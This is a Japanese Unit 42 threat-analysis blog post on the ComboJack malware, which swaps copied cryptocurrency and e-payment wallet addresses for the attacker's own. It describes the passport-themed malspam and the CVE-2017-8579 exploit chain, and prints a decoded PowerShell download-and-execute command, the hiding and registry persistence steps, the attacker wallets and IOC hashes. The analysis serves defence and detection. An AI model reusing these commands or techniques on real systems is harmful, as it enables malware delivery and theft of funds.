• JP
  • magnifying glass search icon to open search field
  • お問い合わせ
  • リソースセンター
  • サポートを受ける
  • 現在、攻撃を受けていますか?
Palo Alto Networks logo
  • 製品
  • ソリューション
  • サービス
  • 業種
  • パートナー
  • パロアルトネットワークスをお勧めする理由
  • 会社案内
  • その他
  • JP
    Language
  • お問い合わせ
  • リソースセンター
  • サポートを受ける
  • 現在、攻撃を受けていますか?
  • スタート ガイド

仮想通貨窃取のためにクリップボードを書き換えるComboJackマルウェア

Brandon Levene、Josh Grunzweig 3 05, 2018 at 10:00 午後

※ 本記事は2018年3月5日に米国で掲載されたブログ記事の抄訳版となります。

 

要約

パロアルトネットワークスの脅威インテリジェンスチームUnit 42は、日米のユーザーの仮想通貨とオンラインウォレットを標的にした、新しい通貨窃取マルウェア「ComboJack」を発見しました。標的となるクリップボード上の仮想通貨ウォレット アドレスを、攻撃者のアドレスに置き換え、攻撃者のウォレットへの資金の送付を狙う攻撃手法を「クリプトジャック (cryptojack)」と呼びますが、この攻撃手法は、送金先のウォレットをきちんと確認せずに取引を確定してしまうユーザーを標的にしています。2017年に登場したCryptoShufflerは、クリップボードを置き換える初めてのマルウェアでした。CryptoShufflerはビットコインに的を絞っていましたが、今回見つかったComboJackは、Litecoin、Monero、およびEthereumなど、さまざまな仮想通貨を標的としています。

 

詳細

2018年2月25日の早朝、Unit42とProofpointのリサーチャーは、日本と米国のユーザーを標的とした興味深い悪意のあるスパム(マルスパム/malspam)の活動を観測しました。この攻撃は、最初に、パスポートを拾ったと主張し、その写しをPDFとして添付していると見せかけることでターゲットの気を引きます。

 

画像1. ユーザーが受信したマルスパムのサンプル

パスポートのコピーであることを示唆し、落とし主を知っているか尋ねるニュアンスの文章が記載

 

ユーザーがこのPDFを開くと、埋め込まれたdocファイルをご覧くださいという1行の文章が表示されます。これは、2017年半ばにDridexやLockyによる攻撃で使用された攻撃手法と類似しています。PDFに埋め込まれたRTFファイルにリモートオブジェクトが含まれていて、CVE-2017-8579の脆弱性を突きます(詳細はこの FireEyeのレポートでも説明)。

この埋め込まれたリモート オブジェクトは、hXXps://a.doko[.]moe/tnejlnに配置されたHTAファイルで、エンコードされたPowerShellコマンドを含みます。

 

画像2. hXXps://a.doko[.]moe/tnejlnから取得されたHTAファイルのコンテンツ

 

HTAファイルのコンテンツをデコードすると、以下のPowerShellコマンドが実行され、それによってファイルがダウンロードされ実行されます。

 

[BEGIN CODE]
wscript.shell%systemroot%\system32\windowspowershell\v1.0\powershell.exe (new-object system.net.webclient).downloadfile(
 hXXp://masolo[.]win/protect/achi.exe $env:appdata\bstest.exe) ; start $env:appdata\bstest.exe
[END CODE]

 

それが、私たちが「ComboJack」と呼ぶペイロードにつながります。

 

ComboJack

 

弊社は、以下の表で説明するファイルを分析しています。

 

初期ファイルのSHA256

9613aefc12880528040812b0ce9d3827d1c25fe66f8598eaef82c169e8ed02da

 

第2段階のSHA256

cab010b59cf9d649106477df012ca49f939aa537910b56bfadbe1381b0484d88

最終ペイロードのSHA256

05dfde82a9790943df8dfab6b690ec18711ce3558f027dd74504b125d24d6136

 

最初にダウンロードされるファイルは自己解凍型実行ファイル(SFX)で、第2段階のファイルを解凍するコマンドが埋め込まれています。第2段階のファイルはパスワードで保護されたSFXですが、パスワードは第1段階で供給され、第2段階のファイルを容易に復元できます。便利なことに、第1段階の「setup.txt」には以下のようなコンテンツが含まれています。

 

画像3. ペイロードの最初のSFX層に埋め込まれたsetup.txtのコンテンツ

 

第2段階が解凍され実行されると、私たちがComboJackと呼ぶ最終段階の攻撃に進みます。ComboJackは解凍されると、自身を以下の場所にコピーし始めます。

 

[BEGIN CODE]
C:\\ProgramData\\NVIDIA\\NVDisplay.Container.exe
[END CODE]

 

次に、組み込まれたWindowsツールであるattrib.exe (ファイル属性の設定に使用される)を使用して、非表示属性とシステム属性の両方を自身に設定します。これにより、ファイルはユーザーに対して非表示になり、SYSTEMレベル権限で実行されるようになります。

 

[BEGIN CODE]
"cmd /k attrib +s +h \"C:\\ProgramData\\NVIDIA\\NVDisplay.Container.exe\""
[END CODE]

 

最終的に、ペイロードは以下のレジストリ キーを設定して、永続性を確保します。

 

[BEGIN CODE]
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\NVIDIA – C:\ ProgramData\NVIDIA\NVDisplay.Container.exe
[END CODE]

 

上記の手順が完了すると、ComboJackは無限ループに入ります。0.5秒ごとにクリップボードの内容をチェックします。さまざまな条件でクリップボードの内容がチェックされ、ターゲットが複数の仮想通貨のウォレット情報をコピーしていないかどうかを判断します。目的のウォレットが見つかると、ComboJackはそれを、攻撃者が所有しているだろうハードコードされたウォレットと置き換え、ターゲットがうっかり誤った場所に送金するように仕向けます。この策略は、通常ウォレットのアドレスが長くて複雑であることから、ほとんどのユーザーが、タイプミスを防ぐためにアドレスそのものをコピーする傾向があることを利用しています。仮想通貨のウォレットとみられるアドレスが見つかると、それらは以下の表に示す条件に従って置き換えられます。

 

検索される条件

置換されるアドレス

ウォレットの種類

長さが42で「0」で始まる

0xE44598AB74425450692F7b3a9f898119968da8Ad

Ethereum(イーサリアム)

長さが106で「4」で始まる

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBE

Monero (しかし置換文字列は長くなく、おそらく攻撃者のミスと思われる。Moneroのアドレスは95または106文字である必要がある)

長さが34で「1」で始まる

1LGskAycxvcgh6iAoigcvbwTtFjSfdod2x

ビットコイン

長さが34で「L」で始まる

LYB56d6TeMg6VmahcgfTZSALAQRcNRQUV

Litecoin(ライトコイン)

長さが11で「8」で始まる

79965017478

Qiwi (ロシアを中心とした電子決済サービス)

長さが13で「R」で始まる

R064565691369

WebMoney (ルーブル)

長さが13で「Z」で始まる

Z152913748562

WebMoney (米国ドル)

長さが13で「E」で始まる

88888888888888888888888888888888888888888888888888

不明

長さが15で「4100」で始まる

410014474125403

Yandex Money (ロシアを中心としたオンライン決済サービス)

表1.ComboJackにハードコードされた置換アドレスの参照テーブル

 

ComboJackは、基本的な機能において、2017年にKasperskyによって発見されたマルウェアであるCryptoShufflerと共通性があります。しかし、CryptoShufflerが仮想通貨に的を絞ったものであったのに対し、ComboJackはWebMoney (米国ドル、ユーロ、およびルーブル) やYandex Moneyのような人気のあるデジタル支払いシステムも標的としています。

 

結論

 

仮想通貨のマイニングマルウェアが広まるにつれ、一部の攻撃者がWebベースの通貨を取得するために特別な手法を使用するのは興味深いです。2017年のCryptoshufflerは、ComboJackのようなシンプルかつ効果的なクリップボード窃取マルウェアの始まりに過ぎなかったのかもしれません。複数の仮想通貨とWebベースのウォレットを標的にすることで、ComboJackの作成者は自身の損失を分散させているようにも見えます。仮想通貨の価格が上がり続けるにつれ、ますます多くの仮想通貨を標的とするマルウェアが出現することになるでしょう。それが大金を得るための手っ取り早い手段だからです。

 

パロアルトネットワークスWildFireのお客様は、以下の方法でこの脅威から保護されています。

 

  • ComboJackマルウェアは、次世代エンドポイントセキュリティTrapsおよびクラウド脅威解析WildFireによって識別され、ブロックされます
  • 脅威インテリジェンスサービスAutoFocusでタグを検索することでComboJackを監視および、追跡できます

 

IOC

 

おとり PDF:

dd8ba88df50de86e7bb9b6343313e48e1e3b8d1a84ffca0a06a203a2f027cfdc
d3a5313a0070b8400b0d661f2515a0eb83e4e6110b98e9ffb6618e457bf52714
15e6984beea04bf2f26fbbe1e490c59d1f51ba7ad0dce3ac76cea21579ca694b
325fd50143d6d975d9db18cf9a069c9107c3bfcad5a07653d53c0fc315ee27ab

 

ペイロード:

bd1b56b6814aae369b0593dfe71450e1b45cb288f752faa2622d1b189bc6b2d6
228e8b728f7b714934f5ecfa6fd5de256d1d24f634a63f2fc4663c7cfb3b9d65
05dfde82a9790943df8dfab6b690ec18711ce3558f027dd74504b125d24d6136
d92b4c622d3524f6d5ce8fe53d802c6a0c51fd1f56ac2b554daac24d7b4fb8ef
4d96d8cfefd9cc3f86bd3ab7f054f0b0acef726a4c349359bf44d22952b4744d
85c27addbf3a7234ac1e2922002fdef216994708bdda28f2ad6d3a7a1b32934e
ea5eb17c32767486c1b3a8ee7a8eacefab125c93414cdea97348c2ee96752f7e
a6807cf5ed53b34cc9513defcde56c8a956c3d574ee9f300b3a763a7c8287081
8d8f497313ed797090ef552d44198f8c21f0a6ed261b30902d4d37478cd2efeb
47f14c24212c32e686f0b9162530c4b966c9cff907e1920c096ad81d078f20cd
05cbc6b1e98bc6f8935f95454ba214cccaf3a36c497126512669daba59a407a0
8a6f75a4a58bdafed085fd640681a4c94eee54f1bfb6e5eb6dcf8eb7524d2a2e
2ee9a1c554a774925f83428a0822b901d7b3ed81c247cb0d038ecc188d9f9149
d0f6dcdb4f749490a7ef678e9006474c885fbb3d8e396a5c8f2150441bb34782
a10a5666ce31c7a3de760f33d93bd924354e7bac1f07bde9e3ac3da8e250eb6d
98e896586ea71f80a2b0024ec86133bfa5163f01f4faa1b1f380f0a2ea128c2f
f9bff08960484d5c97f075090b9843dc1d54839a4dabc514e8f97f809e1ceaf5
c1cc9448ee5684698f7891911821a9eb86f56be8852adef613b2fab4636e7b36
ece82af6fa1e94904d62e86fe86810fe85b058e56a311ca24ac7667409cff8c0

 

 

ニュース

Wireshark によるパケット解析講座 1

Wireshark は無料で利用できるプロトコル アナライザです。 Wireshark を使うとネットワーク トラフィックをキャプチャしたり、キャプチャしたパケットを表示させることができます。そこでパロアルトネットワークスの脅威インテリジェンス調査チーム Unit42 に所属するアナリストが、Wireshark を使ってマルウェア検体が生成したトラフィックをレビューするさいに利用している便利な使いかたをご紹介していきます。
January 17, 2019

ニュース

Wireshark によるパケット解析講座 3

前回までではWiresharkの列表示のカスタマイズ方法と表示フィルタの式について見ていきました。本稿ではトラフィックから感染ないし侵害を受けたホスト名やユーザーを特定する方法について説明します。
March 31, 2019

ニュース

Wireshark によるパケット解析講座 2

前回は Wiresharkの列表示のカスタマイズ方法について見ていきました。本稿では脅威インテリジェンスの調査上便利なフィルタリングの設定方法について説明します。
January 20, 2019

ニュース

DNSトンネリング: 攻撃者はDNSをどう悪用するのか

悪意のある攻撃者は、ドメインネームサービス(DNS)をコマンド&コントロール(C2)用通信チャネルとして悪用してきました。またこのプロトコルはこのほかに、データを漏出させる目的でも悪用されてきました。DNS の悪用はC2に「ハートビート」接続のために通信するという用途からさらに広がっており、攻撃者はここ数年、悪意のあるデータやペイロードをDNS経由で被害者のシステムに侵入させる用途にもDNSを使っています。本稿では、DNSを悪用したデータ侵入・漏出の種類、方法、使用方法を紹介し、その防御メカニズムへの指針を示します。
March 18, 2019

ニュース

Wireshark によるパケット解析講座 4

セキュリティ専門家は、不審なアクティビティのパケット キャプチャ(pcap)をレビューする際、より詳しく調べるために、オブジェクトをpcapからエクスポートしなければならない場合があります。
July 12, 2019

データシート

PA-400シリーズ

パロアルトネットワークスの機械学習を活用したNGFW「PA-400 Series (PA-460、PA-450、PA-440)」なら、分散した大企業の支社、小売店、中規模企業にも次世代ファイアウォール機能を導入できます。
August 3, 2022

最新ニュース、イベント情報、脅威アラートを配信

このフォームを送信すると、お客様は弊社の利用規約とプライバシー ポリシーに同意したものとみなされます。

black youtube icon black twitter icon black facebook icon black linkedin icon
  • USA (ENGLISH)
  • AUSTRALIA (ENGLISH)
  • BRAZIL (PORTUGUÉS)
  • CANADA (ENGLISH)
  • CHINA (简体中文)
  • FRANCE (FRANÇAIS)
  • GERMANY (DEUTSCH)
  • INDIA (ENGLISH)
  • ITALY (ITALIANO)
  • JAPAN (日本語)
  • KOREA (한국어)
  • LATIN AMERICA (ESPAÑOL)
  • MEXICO (ESPAÑOL)
  • SINGAPORE (ENGLISH)
  • SPAIN (ESPAÑOL)
  • TAIWAN (繁體中文)
  • UK (ENGLISH)

人気のあるリソース

  • 会社概要
  • イベント センター
  • イベント
  • リソースセンター
  • プレスリリース
  • Unit42 ブログ
  • 投資家の皆様へ
  • ブログ
  • Japan Live Community
  • Tech Docs
  • キャリア
  • お問い合わせ
  • サイトマップ

法定通知

  • プライバシー
  • 個人情報保護基本方針
  • 利用規約
  • トラスト センター
  • ドキュメント
  • 一般事業主行動計画

アカウント

  • 購読の管理
  • パートナーログイン
  • パートナーになる
脆弱性の報告

Copyright © 2023 Palo Alto Networks. All rights reserved